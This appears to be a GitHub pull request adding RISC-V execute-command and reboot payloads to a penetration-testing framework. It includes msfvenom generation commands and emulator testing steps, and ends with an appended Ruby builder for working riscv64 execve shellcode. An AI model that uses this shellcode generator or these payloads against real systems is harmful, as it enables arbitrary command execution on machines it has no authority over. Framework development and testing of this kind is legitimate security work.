Add support for RISC-V 32-bit / 64-bit Little Endian payloads #19518
base: master
Conversation
This PR is ready for testing. Tests are passing, with the exception of an unrelated PHP-related test which failed after 15+ minutes.

Hardware

Milk-V and Pine64 sell cheap (US$10) RISC-V boards capable of running Linux + userland utilities. Tested on:

Emulation

QEMU

QEMU supports RISC-V. QEMU versions 8.2.93 and 9.1.50 emulate RISC-V well. Debian Quick Image Baker images can be used to easily emulate a Debian RISC-V Linux system. Ubuntu and Fedora images are also available. I can provide QEMU command line arguments for these if required.

TinyEMU

Also tested with tinyemu:
@dwelch-r7, if you happen to create an emulated RISC-V Ubuntu VM, could I talk you into installing kernel 5.19 and testing #19460 ? 😄
FWIW; here's a working QEMU invocation for Ubuntu 22.04.1 Server with
Use the commented
You may need the
I've also added Linux Execute Command 32-bit/64-bit RISC-V LE payloads. @bwatters-r7 These payloads should be useful for the Overlay exploit. Both payloads were tested successfully in an emulator. The 64-bit payload was also tested on real hardware.

Linux Execute Command (64-bit)

Linux Execute Command (32-bit)
Add support for RISC-V 32-bit / 64-bit Little Endian payloads. Includes Linux Execute Command payloads and Linux Reboot payloads for testing.

- riscv32 successfully
- riscv64 successfully

Note: We don't handle `syscall` failure or call `exit`. This saves a few bytes.

Note: Executing 32-bit payloads in a 64-bit environment will fail.

Note: Executing the Linux Reboot payloads as a low privileged user will crash. `reboot` is a privileged syscall.

Note: Executing the Linux Execute Command payloads in a Linux environment where `/bin/sh` is a symlink to BusyBox `/bin/busybox` (such as MilkV Duo default image) will crash. This is a WontFix for me. For testing purposes, you can work around this with: `sudo cp /bin/sh /bin/sh.old && sudo cp /bin/bash /bin/sh`.

Motivation
This PR lays the foundation for further development of RISC-V payloads.
RISC-V is gaining popularity. Major Linux distributions (Ubuntu, Debian, and Fedora) offer RISC-V development builds. RISC-V based SBCs and consumer-grade laptops are slowly entering the market.
Verification
Linux Reboot
Generate a Linux Reboot payload (with optional NOP sled):
./msfvenom -n 100 --format elf -p linux/riscv64le/reboot > reboot.elf
Execute the payload with QEMU (I suggest doing this within an emulated Linux environment):
/home/user/qemu/build/qemu-riscv64 -strace ./reboot.elf
sudo /home/user/qemu/build/qemu-riscv64 -strace ./reboot.elf
Linux Execute Command
Generate a Linux Execute Command payload (with optional NOP sled):
./msfvenom --format elf -p linux/riscv64le/exec "CMD=echo Hello, World\!>/tmp/asdf" > exec.elf
Execute the payload with QEMU (optionally within an emulated Linux environment):
/home/user/qemu/build/qemu-riscv64 -strace ./exec.elf

`Hello, World!` should now exist in `/tmp/asdf`.

Linux Reboot
Source (64-bit)
Source (32-bit)
Linux Execute Command
Source (64-bit)
Uses modexp's RISC-V 64-bit shellcode.
Source (32-bit)
Uses modexp's RISC-V 64-bit shellcode modified for RISC-V 32-bit.
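As an added illustration (this is not code from the PR, nor modexp's shellcode that the payloads are based on), the block below is a small Ruby encoder that builds a position-independent `execve("/bin/sh", ["/bin/sh", "-c", CMD], NULL)` blob for riscv64le, the same shape the Linux Execute Command payload has. The instruction formats (I/U/S-type), register numbers and the `execve` syscall number 221 come from the RISC-V ISA and the riscv64 Linux syscall table; the concrete layout (argv assembled on the stack, strings reached via `auipc`/`addi` from the instruction's own address) is my own choice and is not necessarily the one the PR's payload uses. As in the PR's note, nothing is done if `ecall` fails.

```ruby
# Added example: minimal riscv64le execve("/bin/sh", ["/bin/sh","-c",cmd], NULL)
# payload builder.  Encodings follow the RISC-V spec; the layout is an
# assumption of this example, not the PR's shellcode.
module Riscv64Exec
  ZERO = 0; SP = 2; A0 = 10; A1 = 11; A2 = 12; A7 = 17   # x-register numbers
  SYS_EXECVE = 221                                       # riscv64 Linux __NR_execve

  # One 32-bit little-endian instruction word.
  def self.word(v)
    [v & 0xffffffff].pack('V')
  end

  # I-type: imm[11:0] rs1 funct3 rd opcode  (addi: opcode 0x13, funct3 0)
  def self.addi(rd, rs1, imm)
    raise ArgumentError, 'imm out of 12-bit range' unless (-2048..2047).cover?(imm)
    word(((imm & 0xfff) << 20) | (rs1 << 15) | (rd << 7) | 0x13)
  end

  # U-type: imm[31:12] rd opcode  (auipc: opcode 0x17); rd = pc + (imm20 << 12)
  def self.auipc(rd, imm20)
    word(((imm20 & 0xfffff) << 12) | (rd << 7) | 0x17)
  end

  # S-type: imm[11:5] rs2 rs1 funct3 imm[4:0] opcode  (sd: opcode 0x23, funct3 3)
  def self.sd(rs2, rs1, imm)
    word((((imm >> 5) & 0x7f) << 25) | (rs2 << 20) | (rs1 << 15) | (3 << 12) |
         ((imm & 0x1f) << 7) | 0x23)
  end

  def self.ecall
    word(0x73)
  end

  # Build the payload for cmd.  Each string is addressed relative to the
  # auipc that loads it, so the blob works at any load address.
  def self.build(cmd)
    raise ArgumentError, 'command must not contain NUL' if cmd.include?("\0")
    strings  = ['/bin/sh', '-c', cmd]
    code_len = 15 * 4                      # 15 fixed instructions below
    offsets  = []
    pos = code_len
    strings.each { |s| offsets << pos; pos += s.bytesize + 1 }

    code = ''.b
    [A0, A1, A2].each_with_index do |reg, i|
      pc = i * 8                           # byte offset of this auipc in the blob
      code << auipc(reg, 0) << addi(reg, reg, offsets[i] - pc)
    end
    code << addi(SP, SP, -32)              # room for argv[0..3]
    code << sd(A0, SP, 0)                  # argv[0] = "/bin/sh"
    code << sd(A1, SP, 8)                  # argv[1] = "-c"
    code << sd(A2, SP, 16)                 # argv[2] = cmd
    code << sd(ZERO, SP, 24)               # argv[3] = NULL
    code << addi(A1, SP, 0)                # a1 = argv
    code << addi(A2, ZERO, 0)              # a2 = envp = NULL
    code << addi(A7, ZERO, SYS_EXECVE)     # a7 = __NR_execve
    code << ecall                          # no exit path on failure (as in the PR)
    raise 'code length drifted' unless code.bytesize == code_len
    code + strings.map { |s| s + "\0" }.join.b
  end
end

if $PROGRAM_NAME == __FILE__
  blob = Riscv64Exec.build(ARGV[0] || 'id > /tmp/out')   # constructed sample command
  $stdout.binmode
  $stdout.write(blob)
end
```

The blob is raw shellcode; to run it under `qemu-riscv64` it still needs to be wrapped in an ELF (for example with `msfvenom --format elf` and a custom payload, or a hand-written header). A riscv32 variant would need `sw` stores into 4-byte argv slots instead of `sd` into 8-byte ones, which is why, as the PR notes, the two widths are not interchangeable.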